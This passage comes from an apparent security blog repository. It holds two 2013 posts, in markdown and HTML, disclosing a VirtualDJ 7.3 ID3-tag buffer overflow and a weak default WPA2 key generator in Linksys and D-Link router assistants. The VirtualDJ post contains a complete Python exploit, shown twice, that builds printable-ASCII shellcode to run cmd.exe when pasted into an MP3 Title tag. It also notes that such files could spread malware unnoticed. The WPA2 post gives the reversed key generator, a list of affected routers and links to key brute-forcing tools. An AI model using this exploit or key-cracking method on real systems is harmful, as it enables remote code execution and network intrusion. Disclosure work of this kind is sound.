 10 | We cannot assign the `eip` the address of the first buffer directly since it contains characters which are not in range A-Z. However if we take into account the previous information, we can do this indirectly: We write in the bytes 4100:4104 of the title `"FSFD"`. After the buffer overflows occurs we get `eip == 0×44465346 == "FSFD"`. At this address (inside _urlmon.dll_) we find a `call edi` instruction and so the bytes in the first buffer will be executed. Now we face another problem. VirtualDJ has inserted a 0xC3 byte (`retn`) before each non-printable ASCII character in the first buffer and we cannot execute the shellcode directly. We can solve this by pushing into the stack the bytes of the shellcode using only printable ASCII characters. Let me explain:
 11 | 
 12 | Instead of pushing the bytes 0xB8, 0xFF, 0xEF, 0xFF (FFEFFFB8h) directly, we can do exactly the same using only printable ASCII characters by using the string `"%@@@@%????-R@D@-R@D@-R@D@-R?C?P"`:
 13 | 
 14 | ```asm
 15 | and   eax, 40404040h   ; 25 40 40 40 40  == "%@@@@"
 16 | and   eax, 3F3F3F3Fh   ; 25 3F 3F 3F 3F  == "%????"  <– eax == 0
 17 | sub   eax, 40444052h   ; 2D 40 44 40 52  == "-R@D@"
 18 | sub   eax, 40444052h   ; 2D 40 44 40 52  == "-R@D@"
 19 | sub   eax, 40444052h   ; 2D 40 44 40 52  == "-R@D@"
 20 | sub   eax, 3F433F52h   ; 2D 3F 43 3F 52  == "-R?C?"  <– eax == 0xFFEFFFB8
 21 | push  eax              ; 50              == "P"
 22 | ```
 23 | 
 24 | Once all the bytes of the shellcode are pushed into the stack (in inverse order) we use `push esp` (0×54) and `retn` (0xC3) to run the shellcode. Obviously, it does not matter if VirtualDJ pushes another 0xC3 byte before this one.
 25 | 
 26 | This is a pretty serious vulnerability since VirtualDJ is considered the #1 software for mixing music with millions of downloads around the world. By exploiting this vulnerability it would be possible to spread quickly a malware just by uploading a malicious MP3 file in a popular site. Even worse, this file might not be a suspicious file for antivirus software. Note how the 4096 padding bytes could be replaced by something apparently harmless such as the real title of the MP3 file followed by a lot of spaces.
 27 | 
 28 | ```python
 29 | #Exploit: VirtualDJ Pro/Home <=7.3 Buffer Overflow Vulnerability 
 30 | #By: Alexandro Sanchez Bach | functionmixer.blogspot.com 
 31 | #More info: http://www.youtube.com/watch?v=PJeaWqMJRm0
 32 |  
 33 | import string
 34 |  
 35 | def unicodeHex(c):
 36 |     c = hex(ord(c))[2:].upper()
 37 |     if len(c)==1: c = "0"+c
 38 |     return c+"00"
 39 |  
 40 | def movEAX(s):
 41 |     #Arrays 
 42 |     s = map(ord, list(s))
 43 |     inst = []
 44 |     target = [512, 512, 512, 512]
 45 |     carry  = [0,-2,-2,-2]
 46 |     for i in range(4):
 47 |         if s[i] < 0x10:
 48 |             target[i] = 256
 49 |             if i < 3:
 50 |                 carry[i+1] = -1
 51 |     diff = [target[b] - s[b] for b in range(4)]
 52 |  
 53 |     #Gen instructions 
 54 |     for i in range(3):
 55 |         target = [target[b] - diff[b]/4 for b in range(4)]
 56 |         inst += [[diff[b]/4 for b in range(4)]]
 57 |     target = [target[b] - s[b] + carry[b] for b in range(4)]
 58 |     inst += [target]
 59 |      
 60 |     #Remove characters '[','\',']' 
 61 |     for b in range(4):
 62 |         if ord("[")  in [inst[i][b] for i in range(4)] or \
 63 |            ord("\\") in [inst[i][b] for i in range(4)] or \
 64 |            ord("]")  in [inst[i][b] for i in range(4)]:
 65 |             for i in range(4):
 66 |                 inst[i][b] = inst[i][b] + 5*((-1)**(i))
 67 |      
 68 |     inst  = ["\x2D" + "".join(map(chr, i)) for i in inst]
 69 |     return "".join(inst)
 70 | 
 71 | #Shellcode: Run cmd.exe 
 72 | shellcode  = "\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC"
 73 | shellcode += "\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45"
 74 | shellcode += "\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45"
 75 | shellcode += "\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45"
 76 | shellcode += "\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3"
 77 | retAddress = "\xED\x1E\x94\x7C" # JMP ESP ntdll.dll WinXP SP2 
 78 | shellcode += retAddress
 79 |  
 80 | while len(shellcode) % 4 != 0:
 81 |     shellcode += '\x90'
 82 | exploit = ""
 83 | for i in range(0,len(shellcode),4)[::-1]:
 84 |     exploit += "\x25\x40\x40\x40\x40\x25\x3F\x3F\x3F\x3F"  #EAX = 0 
 85 |     exploit += movEAX(shellcode[i:i+4])  #EAX = shellcode[i:i+4] 
 86 |     exploit += "\x50"  #PUSH EAX 
 87 | exploit += '\x54\xC3' #PUSH ESP; RETN 
 88 |  
 89 | c = 0
 90 | for i in exploit:
 91 |     if i in string.ascii_letters:
 92 |         c += 1
 93 | exploit +=  "A" * (4100 - c)
 94 | exploit += "FSFD"
 95 |  
 96 | print exploit
 97 | #Paste the generated code in the tag 'Title' of the MP3 file.
 98 | ```
 99 | 
100 | You can see a demo of this proof of concept at: https://www.youtube.com/watch?v=PJeaWqMJRm0.
101 | 
102 | ## Log
103 | 
104 | * __2012-11-29__: Bug discovered. VirtualDJ was emailed about this a few days later.
105 | * __2013-03-20__: Bug fixed with the release of VirtualDJ Pro/Home 7.4.
106 | * __2013-03-29__: Exploit published.
107 | 


--------------------------------------------------------------------------------
/posts/2013-03-30-virtualdj-73-buffer-overflow/index.html:
--------------------------------------------------------------------------------
  1 | <!-- This file has been auto-generated! -->
  2 | <!DOCTYPE html>
  3 | <html>
  4 |     <head>
  5 |         <meta charset="utf-8">
  6 |         <meta name="viewport" content="width=device-width, initial-scale=1">
  7 |         <title>VirtualDJ Pro/Home 7.3: Buffer Overflow</title>
  8 |         <!-- Style -->
  9 |         <link rel="stylesheet" href="../../css/code.css">
 10 |         <link rel="stylesheet" href="../../css/markdown.css">
 11 |         <style>
 12 |             body {
 13 |                 box-sizing: border-box;
 14 |                 min-width: 200px;
 15 |                 max-width: 980px;
 16 |                 margin: 0 auto;
 17 |                 padding: 45px;
 18 |             }
 19 | 
 20 |             header {
 21 |                 position: relative;
 22 |             }
 23 |             header > .links {
 24 |                 position: absolute;
 25 |                 right: 0;
 26 |             }
 27 | 
 28 |             .post-key {
 29 |                 background-color: hsl(45, 67%, 80%);
 30 |                 border-radius: 5px 0px 0px 5px;
 31 |                 padding: 2px 6px 2px 8px;
 32 |                 margin: 0px;
 33 |             }
 34 |             .post-val {
 35 |                 background-color: hsl(45, 67%, 90%);
 36 |                 border-radius: 0px 5px 5px 0px;
 37 |                 padding: 2px 8px 2px 6px;
 38 |                 margin: 0px;
 39 |             }
 40 | 
 41 |             footer {
 42 |                 text-align: center;
 43 |             }
 44 |         
 45 |             @media (max-width: 767px) {
 46 |                 body {
 47 |                     padding: 15px;
 48 |                 }
 49 |             }
 50 |         </style>
 51 |     </head>
 52 |     <body class="markdown-body">
 53 |         <header>
 54 |             <div class="links">
 55 |                 <span>
 56 |                     <a href="https://twitter.com/AlexAltea">Twitter</a> |
 57 |                     <a href="https://github.com/AlexAltea">Github</a> |
 58 |                     <a href="mailto:alexandro@phi.nz">Email</a>
 59 |                 </span>
 60 |             </div>
 61 |             <span><a href="../../">&lt; Other articles</a></span>
 62 |         </header>
 63 |         <article>
 64 |             <h1>VirtualDJ Pro/Home 7.3: Buffer Overflow</h1>
 65 |             <p>
 66 |                 <span 
 67 |                     class="post-key">Author</span><span
 68 |                     class="post-val">Alexandro Sanchez</span>
 69 |                 <span
 70 |                     class="post-key">Date</span><span
 71 |                     class="post-val">2013-03-30</span>
 72 |             </p>
 73 |             <p>I have found a buffer overflow vulnerability in <a href="http://www.virtualdj.com/">VirtualDJ Pro 7.3 and VirtualDJ Home 7.3</a> and possibly previous versions of this software. When the user enters a folder, VirtualDJ tries to retrieve all information from the ID3 tags of MP3 files inside such as <em>Title</em>, <em>Album</em>, and <em>Artist</em> and stores it in a buffer. After that, a second buffer of length 4096 is allocated in the stack and only the characters <code>[A-Z]</code> from the first buffer will be copied to it. According to the ID3 v2.x standard, these tags can have a length greater than 4096; therefore it is possible to produce a buffer overflow in this second buffer. At the time when the buffer overflow happens and the program reaches the <code>retn</code> instruction, the <code>edi</code> register points to the first buffer.</p>
 74 | <p>We cannot assign the <code>eip</code> the address of the first buffer directly since it contains characters which are not in range A-Z. However if we take into account the previous information, we can do this indirectly: We write in the bytes 4100:4104 of the title <code>"FSFD"</code>. After the buffer overflows occurs we get <code>eip == 0×44465346 == "FSFD"</code>. At this address (inside <em>urlmon.dll</em>) we find a <code>call edi</code> instruction and so the bytes in the first buffer will be executed. Now we face another problem. VirtualDJ has inserted a 0xC3 byte (<code>retn</code>) before each non-printable ASCII character in the first buffer and we cannot execute the shellcode directly. We can solve this by pushing into the stack the bytes of the shellcode using only printable ASCII characters. Let me explain:</p>
 75 | <p>Instead of pushing the bytes 0xB8, 0xFF, 0xEF, 0xFF (FFEFFFB8h) directly, we can do exactly the same using only printable ASCII characters by using the string <code>"%@@@@%????-R@D@-R@D@-R@D@-R?C?P"</code>:</p>
 76 | <div class="codehilite"><pre><span></span><span class="nf">and</span>   <span class="no">eax</span><span class="p">,</span> <span class="mi">40404040</span><span class="no">h</span>   <span class="c">; 25 40 40 40 40  == &quot;%@@@@&quot;</span>
 77 | <span class="nf">and</span>   <span class="no">eax</span><span class="p">,</span> <span class="mi">3</span><span class="no">F3F3F3Fh</span>   <span class="c">; 25 3F 3F 3F 3F  == &quot;%????&quot;  &lt;– eax == 0</span>
 78 | <span class="nf">sub</span>   <span class="no">eax</span><span class="p">,</span> <span class="mi">40444052</span><span class="no">h</span>   <span class="c">; 2D 40 44 40 52  == &quot;-R@D@&quot;</span>
 79 | <span class="nf">sub</span>   <span class="no">eax</span><span class="p">,</span> <span class="mi">40444052</span><span class="no">h</span>   <span class="c">; 2D 40 44 40 52  == &quot;-R@D@&quot;</span>
 80 | <span class="nf">sub</span>   <span class="no">eax</span><span class="p">,</span> <span class="mi">40444052</span><span class="no">h</span>   <span class="c">; 2D 40 44 40 52  == &quot;-R@D@&quot;</span>
 81 | <span class="nf">sub</span>   <span class="no">eax</span><span class="p">,</span> <span class="mi">3</span><span class="no">F433F52h</span>   <span class="c">; 2D 3F 43 3F 52  == &quot;-R?C?&quot;  &lt;– eax == 0xFFEFFFB8</span>
 82 | <span class="nf">push</span>  <span class="no">eax</span>              <span class="c">; 50              == &quot;P&quot;</span>
 83 | </pre></div>
 84 | 
 85 | 
 86 | <p>Once all the bytes of the shellcode are pushed into the stack (in inverse order) we use <code>push esp</code> (0×54) and <code>retn</code> (0xC3) to run the shellcode. Obviously, it does not matter if VirtualDJ pushes another 0xC3 byte before this one.</p>
 87 | <p>This is a pretty serious vulnerability since VirtualDJ is considered the #1 software for mixing music with millions of downloads around the world. By exploiting this vulnerability it would be possible to spread quickly a malware just by uploading a malicious MP3 file in a popular site. Even worse, this file might not be a suspicious file for antivirus software. Note how the 4096 padding bytes could be replaced by something apparently harmless such as the real title of the MP3 file followed by a lot of spaces.</p>
 88 | <div class="codehilite"><pre><span></span><span class="c1">#Exploit: VirtualDJ Pro/Home &lt;=7.3 Buffer Overflow Vulnerability </span>
 89 | <span class="c1">#By: Alexandro Sanchez Bach | functionmixer.blogspot.com </span>
 90 | <span class="c1">#More info: http://www.youtube.com/watch?v=PJeaWqMJRm0</span>
 91 | 
 92 | <span class="kn">import</span> <span class="nn">string</span>
 93 | 
 94 | <span class="k">def</span> <span class="nf">unicodeHex</span><span class="p">(</span><span class="n">c</span><span class="p">):</span>
 95 |     <span class="n">c</span> <span class="o">=</span> <span class="nb">hex</span><span class="p">(</span><span class="nb">ord</span><span class="p">(</span><span class="n">c</span><span class="p">))[</span><span class="mi">2</span><span class="p">:]</span><span class="o">.</span><span class="n">upper</span><span class="p">()</span>
 96 |     <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">c</span><span class="p">)</span><span class="o">==</span><span class="mi">1</span><span class="p">:</span> <span class="n">c</span> <span class="o">=</span> <span class="s2">&quot;0&quot;</span><span class="o">+</span><span class="n">c</span>
 97 |     <span class="k">return</span> <span class="n">c</span><span class="o">+</span><span class="s2">&quot;00&quot;</span>
 98 | 
 99 | <span class="k">def</span> <span class="nf">movEAX</span><span class="p">(</span><span class="n">s</span><span class="p">):</span>
100 |     <span class="c1">#Arrays </span>
101 |     <span class="n">s</span> <span class="o">=</span> <span class="nb">map</span><span class="p">(</span><span class="nb">ord</span><span class="p">,</span> <span class="nb">list</span><span class="p">(</span><span class="n">s</span><span class="p">))</span>
102 |     <span class="n">inst</span> <span class="o">=</span> <span class="p">[]</span>
103 |     <span class="n">target</span> <span class="o">=</span> <span class="p">[</span><span class="mi">512</span><span class="p">,</span> <span class="mi">512</span><span class="p">,</span> <span class="mi">512</span><span class="p">,</span> <span class="mi">512</span><span class="p">]</span>
104 |     <span class="n">carry</span>  <span class="o">=</span> <span class="p">[</span><span class="mi">0</span><span class="p">,</span><span class="o">-</span><span class="mi">2</span><span class="p">,</span><span class="o">-</span><span class="mi">2</span><span class="p">,</span><span class="o">-</span><span class="mi">2</span><span class="p">]</span>
105 |     <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">4</span><span class="p">):</span>
106 |         <span class="k">if</span> <span class="n">s</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">&lt;</span> <span class="mh">0x10</span><span class="p">:</span>
107 |             <span class="n">target</span><span class="p">[</span><span class="n">i</span><span class="p">]</span> <span class="o">=</span> <span class="mi">256</span>
108 |             <span class="k">if</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">3</span><span class="p">:</span>
109 |                 <span class="n">carry</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span>
110 |     <span class="n">diff</span> <span class="o">=</span> <span class="p">[</span><span class="n">target</span><span class="p">[</span><span class="n">b</span><span class="p">]</span> <span class="o">-</span> <span class="n">s</span><span class="p">[</span><span class="n">b</span><span class="p">]</span> <span class="k">for</span> <span class="n">b</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">4</span><span class="p">)]</span>
111 | 
112 |     <span class="c1">#Gen instructions </span>
113 |     <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">3</span><span class="p">):</span>
114 |         <span class="n">target</span> <span class="o">=</span> <span class="p">[</span><span class="n">target</span><span class="p">[</span><span class="n">b</span><span class="p">]</span> <span class="o">-</span> <span class="n">diff</span><span class="p">[</span><span class="n">b</span><span class="p">]</span><span class="o">/</span><span class="mi">4</span> <span class="k">for</span> <span class="n">b</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">4</span><span class="p">)]</span>
115 |         <span class="n">inst</span> <span class="o">+=</span> <span class="p">[[</span><span class="n">diff</span><span class="p">[</span><span class="n">b</span><span class="p">]</span><span class="o">/</span><span class="mi">4</span> <span class="k">for</span> <span class="n">b</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">4</span><span class="p">)]]</span>
116 |     <span class="n">target</span> <span class="o">=</span> <span class="p">[</span><span class="n">target</span><span class="p">[</span><span class="n">b</span><span class="p">]</span> <span class="o">-</span> <span class="n">s</span><span class="p">[</span><span class="n">b</span><span class="p">]</span> <span class="o">+</span> <span class="n">carry</span><span class="p">[</span><span class="n">b</span><span class="p">]</span> <span class="k">for</span> <span class="n">b</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">4</span><span class="p">)]</span>
117 |     <span class="n">inst</span> <span class="o">+=</span> <span class="p">[</span><span class="n">target</span><span class="p">]</span>
118 | 
119 |     <span class="c1">#Remove characters &#39;[&#39;,&#39;\&#39;,&#39;]&#39; </span>
120 |     <span class="k">for</span> <span class="n">b</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">4</span><span class="p">):</span>
121 |         <span class="k">if</span> <span class="nb">ord</span><span class="p">(</span><span class="s2">&quot;[&quot;</span><span class="p">)</span>  <span class="ow">in</span> <span class="p">[</span><span class="n">inst</span><span class="p">[</span><span class="n">i</span><span class="p">][</span><span class="n">b</span><span class="p">]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">4</span><span class="p">)]</span> <span class="ow">or</span> \
122 |            <span class="nb">ord</span><span class="p">(</span><span class="s2">&quot;</span><span class="se">\\</span><span class="s2">&quot;</span><span class="p">)</span> <span class="ow">in</span> <span class="p">[</span><span class="n">inst</span><span class="p">[</span><span class="n">i</span><span class="p">][</span><span class="n">b</span><span class="p">]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">4</span><span class="p">)]</span> <span class="ow">or</span> \
123 |            <span class="nb">ord</span><span class="p">(</span><span class="s2">&quot;]&quot;</span><span class="p">)</span>  <span class="ow">in</span> <span class="p">[</span><span class="n">inst</span><span class="p">[</span><span class="n">i</span><span class="p">][</span><span class="n">b</span><span class="p">]</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">4</span><span class="p">)]:</span>
124 |             <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">4</span><span class="p">):</span>
125 |                 <span class="n">inst</span><span class="p">[</span><span class="n">i</span><span class="p">][</span><span class="n">b</span><span class="p">]</span> <span class="o">=</span> <span class="n">inst</span><span class="p">[</span><span class="n">i</span><span class="p">][</span><span class="n">b</span><span class="p">]</span> <span class="o">+</span> <span class="mi">5</span><span class="o">*</span><span class="p">((</span><span class="o">-</span><span class="mi">1</span><span class="p">)</span><span class="o">**</span><span class="p">(</span><span class="n">i</span><span class="p">))</span>
126 | 
127 |     <span class="n">inst</span>  <span class="o">=</span> <span class="p">[</span><span class="s2">&quot;</span><span class="se">\x2D</span><span class="s2">&quot;</span> <span class="o">+</span> <span class="s2">&quot;&quot;</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="nb">map</span><span class="p">(</span><span class="nb">chr</span><span class="p">,</span> <span class="n">i</span><span class="p">))</span> <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">inst</span><span class="p">]</span>
128 |     <span class="k">return</span> <span class="s2">&quot;&quot;</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">inst</span><span class="p">)</span>
129 | 
130 | <span class="c1">#Shellcode: Run cmd.exe </span>
131 | <span class="n">shellcode</span>  <span class="o">=</span> <span class="s2">&quot;</span><span class="se">\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC</span><span class="s2">&quot;</span>
132 | <span class="n">shellcode</span> <span class="o">+=</span> <span class="s2">&quot;</span><span class="se">\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45</span><span class="s2">&quot;</span>
133 | <span class="n">shellcode</span> <span class="o">+=</span> <span class="s2">&quot;</span><span class="se">\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45</span><span class="s2">&quot;</span>
134 | <span class="n">shellcode</span> <span class="o">+=</span> <span class="s2">&quot;</span><span class="se">\xFC\x65\xC6\x45\xFD\x78\xC6\x45\xFE\x65\x8D\x45</span><span class="s2">&quot;</span>
135 | <span class="n">shellcode</span> <span class="o">+=</span> <span class="s2">&quot;</span><span class="se">\xF8\x50\xBB\xC7\x93\xBF\x77\xFF\xD3</span><span class="s2">&quot;</span>
136 | <span class="n">retAddress</span> <span class="o">=</span> <span class="s2">&quot;</span><span class="se">\xED\x1E\x94\x7C</span><span class="s2">&quot;</span> <span class="c1"># JMP ESP ntdll.dll WinXP SP2 </span>
137 | <span class="n">shellcode</span> <span class="o">+=</span> <span class="n">retAddress</span>
138 | 
139 | <span class="k">while</span> <span class="nb">len</span><span class="p">(</span><span class="n">shellcode</span><span class="p">)</span> <span class="o">%</span> <span class="mi">4</span> <span class="o">!=</span> <span class="mi">0</span><span class="p">:</span>
140 |     <span class="n">shellcode</span> <span class="o">+=</span> <span class="s1">&#39;</span><span class="se">\x90</span><span class="s1">&#39;</span>
141 | <span class="n">exploit</span> <span class="o">=</span> <span class="s2">&quot;&quot;</span>
142 | <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="nb">range</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span><span class="nb">len</span><span class="p">(</span><span class="n">shellcode</span><span class="p">),</span><span class="mi">4</span><span class="p">)[::</span><span class="o">-</span><span class="mi">1</span><span class="p">]:</span>
143 |     <span class="n">exploit</span> <span class="o">+=</span> <span class="s2">&quot;</span><span class="se">\x25\x40\x40\x40\x40\x25\x3F\x3F\x3F\x3F</span><span class="s2">&quot;</span>  <span class="c1">#EAX = 0 </span>
144 |     <span class="n">exploit</span> <span class="o">+=</span> <span class="n">movEAX</span><span class="p">(</span><span class="n">shellcode</span><span class="p">[</span><span class="n">i</span><span class="p">:</span><span class="n">i</span><span class="o">+</span><span class="mi">4</span><span class="p">])</span>  <span class="c1">#EAX = shellcode[i:i+4] </span>
145 |     <span class="n">exploit</span> <span class="o">+=</span> <span class="s2">&quot;</span><span class="se">\x50</span><span class="s2">&quot;</span>  <span class="c1">#PUSH EAX </span>
146 | <span class="n">exploit</span> <span class="o">+=</span> <span class="s1">&#39;</span><span class="se">\x54\xC3</span><span class="s1">&#39;</span> <span class="c1">#PUSH ESP; RETN </span>
147 | 
148 | <span class="n">c</span> <span class="o">=</span> <span class="mi">0</span>
149 | <span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">exploit</span><span class="p">:</span>
150 |     <span class="k">if</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">string</span><span class="o">.</span><span class="n">ascii_letters</span><span class="p">:</span>
151 |         <span class="n">c</span> <span class="o">+=</span> <span class="mi">1</span>
152 | <span class="n">exploit</span> <span class="o">+=</span>  <span class="s2">&quot;A&quot;</span> <span class="o">*</span> <span class="p">(</span><span class="mi">4100</span> <span class="o">-</span> <span class="n">c</span><span class="p">)</span>
153 | <span class="n">exploit</span> <span class="o">+=</span> <span class="s2">&quot;FSFD&quot;</span>
154 | 
155 | <span class="k">print</span> <span class="n">exploit</span>
156 | <span class="c1">#Paste the generated code in the tag &#39;Title&#39; of the MP3 file.</span>
157 | </pre></div>
158 | 
159 | 
160 | <p>You can see a demo of this proof of concept at: https://www.youtube.com/watch?v=PJeaWqMJRm0.</p>
161 | <h2 id="log">Log</h2>
162 | <ul>
163 | <li><strong>2012-11-29</strong>: Bug discovered. VirtualDJ was emailed about this a few days later.</li>
164 | <li><strong>2013-03-20</strong>: Bug fixed with the release of VirtualDJ Pro/Home 7.4.</li>
165 | <li><strong>2013-03-29</strong>: Exploit published.</li>
166 | </ul>
167 |         </article>
168 |         <hr>
169 |         <footer>
170 |             <p>
171 |                 Questions? Comments? <a href="https://github.com/AlexAltea/blog/issues">Open an issue!</a>
172 |             </p>
173 |             <p><a href="mailto:alexandro@phi.nz">alexandro@phi.nz</a></p>
174 |         </footer>
175 |     </body>
176 | </html>
177 | 


--------------------------------------------------------------------------------
/posts/2013-03-31-wpa2-vulnerability-linksys-dlink/_main.md:
--------------------------------------------------------------------------------
 1 | ---
 2 | layout: post
 3 | date: 2013-03-31
 4 | title: WPA2 Key Generation Vulnerability: Linksys / D-Link
 5 | author: Alexandro Sanchez
 6 | ---
 7 | 
 8 | After finding the [TP-Link WPA2 Key Generation Vulnerability](../2013-03-08-wpa2-vulnerability-tplink/), I reverse-engineered assistants provided by other vendors. It turns out that some Linksys and D-Link routers user nearly identical algorithms to generate the default WPA2 keys as TP-Link routers use. For more information about this vulnerability and its consequences, please refer to the report linked above as redundant information will be omitted here.
 9 | 
10 | This time, the vulnerability affects the **Linksys EasyLink Advisor** and **D-Link Quick Setup Wizard** assistants, both based in *Network Magic*, a software created by Pure Networks, a company belonging to Cisco/Linksys. Since Pure Networks actually sold their software to third parties, e.g. D-Link, there might be a chance of other affected assistants.
11 | 
12 | The reversed generator is:
13 | 
14 | ```python
15 | blacklist_windows = "1I2Z0O5SUV"
16 | blacklist_macosx  = "B8DO0I1S5UVZ2"
17 | blacklist = blacklist_windows  # Change me
18 | 
19 | def gen(seed):
20 |     key = ""
21 |     for i in range(10):
22 |         while True:
23 |             seed = ((seed * 0x343FD) + 0x269EC3) % (2**32)
24 |             edx = ((seed >> 0x10) & 0x7FFF) % 0x24
25 |             if edx >= 0xA:
26 |                 edx += 0x37
27 |             else:
28 |                 edx += 0x30
29 |             if chr(edx) not in blacklist:
30 |                 key += chr(edx)
31 |                 break
32 |     return key
33 | ```
34 | 
35 | The seeds used by this function are obtained in the exactly same way as in the TP-Link assistant. The only difference this time is that rather than pseudorandomly choosing characters from a *whitelist*, it adds random characters in range `[0-9A-Z]`, filtering out those found in a hardcoded *blacklist*, meant to prevent adding visually similar characters such as '`0`' and '`O`' to the key.
36 | 
37 | As explained in the TP-Link vulnerability report, the low entropy can be exploited to bruteforce the key in a matter of minutes with a powerful GPU or hours with a CPU.
38 | 
39 | 
40 | ## Affected routers
41 | 
42 | The complete list of affected Linksys routers is:
43 | 
44 | * WAP610N (Blacklisted characters on Windows assistant: `"1I2Z0O5SUVB8"`)
45 | * WRT110
46 | * WRT120N
47 | * WRT160N (V1, V2, V3)
48 | * WRT160N-HP (V1*)
49 | * WRT160NL
50 | * WRT310N (V1, V2)
51 | * WRT320N
52 | * WRT400N
53 | * WRT54G2
54 | * WRT610N (V1*, V2)
55 | 	
56 | The complete list of affected D-Link routers is:
57 | 
58 | * DGL-4100
59 | * DGL-4300
60 | * DIR-615 (not all revisions)
61 | * DIR-625
62 | * DIR-635
63 | * WBR-1310
64 | * WBR-1310 Rev. B
65 | * WBR-2310
66 | 
67 | 
68 | ## Resources
69 | 
70 | * __Linksys-CheckKeys__: Check if your key is vulnarable to this attack, i.e., find whether your key is in the set of keys generated by all possible seeds. Download: [http://www.mediafire.com/download.php?pmqt9aykwxhwkto](http://www.mediafire.com/download.php?pmqt9aykwxhwkto).
71 | * __Linksys-GenSeeds__: This tool calculates the seed interval from the given time interval in which the router might have been installed. Download: [http://www.mediafire.com/download.php?kpe7844kqd9bk4j](http://www.mediafire.com/download.php?kpe7844kqd9bk4j).
72 | * __Linksys-GenKeys__: Generate a key dictionary by specifying a seed interval. Download: [http://www.mediafire.com/download.php?2h9y0pkay9id1rt](http://www.mediafire.com/download.php?2h9y0pkay9id1rt).
73 | 
74 | 
75 | ## Solutions
76 | 
77 | * Do not use seeds at all. Feed the results of a cryptographically secure PRNG such as `/dev/urandom` in Unix-like sytems as indices of the character array modulo its length. This is for instance what the Linksys E4200 WLAN routers do, the indices of the key character array are provided by `CryptGenRandom` in `Advapi32.dll`.
78 | * If for some reason you want to use seeds for generating keys:
79 |   * Make them bigger than 32-bit. Just 2^32 keys are easy to check.
80 |   * Obtain them from a cryptographically secure PRNG.
81 |   * If you still want to obtain them from the system time, use low granularity time intervals (e.g. elapsed time in nanoseconds rather than seconds) to minimize the number of bits an attacker can guess. 
82 | 


--------------------------------------------------------------------------------
/posts/2013-03-31-wpa2-vulnerability-linksys-dlink/index.html:
--------------------------------------------------------------------------------
  1 | <!-- This file has been auto-generated! -->
  2 | <!DOCTYPE html>
  3 | <html>
  4 |     <head>
  5 |         <meta charset="utf-8">
  6 |         <meta name="viewport" content="width=device-width, initial-scale=1">
  7 |         <title>WPA2 Key Generation Vulnerability: Linksys / D-Link</title>
  8 |         <!-- Style -->
  9 |         <link rel="stylesheet" href="../../css/code.css">
 10 |         <link rel="stylesheet" href="../../css/markdown.css">
 11 |         <style>
 12 |             body {
 13 |                 box-sizing: border-box;
 14 |                 min-width: 200px;
 15 |                 max-width: 980px;
 16 |                 margin: 0 auto;
 17 |                 padding: 45px;
 18 |             }
 19 | 
 20 |             header {
 21 |                 position: relative;
 22 |             }
 23 |             header > .links {
 24 |                 position: absolute;
 25 |                 right: 0;
 26 |             }
 27 | 
 28 |             .post-key {
 29 |                 background-color: hsl(45, 67%, 80%);
 30 |                 border-radius: 5px 0px 0px 5px;
 31 |                 padding: 2px 6px 2px 8px;
 32 |                 margin: 0px;
 33 |             }
 34 |             .post-val {
 35 |                 background-color: hsl(45, 67%, 90%);
 36 |                 border-radius: 0px 5px 5px 0px;
 37 |                 padding: 2px 8px 2px 6px;
 38 |                 margin: 0px;
 39 |             }
 40 | 
 41 |             footer {
 42 |                 text-align: center;
 43 |             }
 44 |         
 45 |             @media (max-width: 767px) {
 46 |                 body {
 47 |                     padding: 15px;
 48 |                 }
 49 |             }
 50 |         </style>
 51 |     </head>
 52 |     <body class="markdown-body">
 53 |         <header>
 54 |             <div class="links">
 55 |                 <span>
 56 |                     <a href="https://twitter.com/AlexAltea">Twitter</a> |
 57 |                     <a href="https://github.com/AlexAltea">Github</a> |
 58 |                     <a href="mailto:alexandro@phi.nz">Email</a>
 59 |                 </span>
 60 |             </div>
 61 |             <span><a href="../../">&lt; Other articles</a></span>
 62 |         </header>
 63 |         <article>
 64 |             <h1>WPA2 Key Generation Vulnerability: Linksys / D-Link</h1>
 65 |             <p>
 66 |                 <span 
 67 |                     class="post-key">Author</span><span
 68 |                     class="post-val">Alexandro Sanchez</span>
 69 |                 <span
 70 |                     class="post-key">Date</span><span
 71 |                     class="post-val">2013-03-31</span>
 72 |             </p>
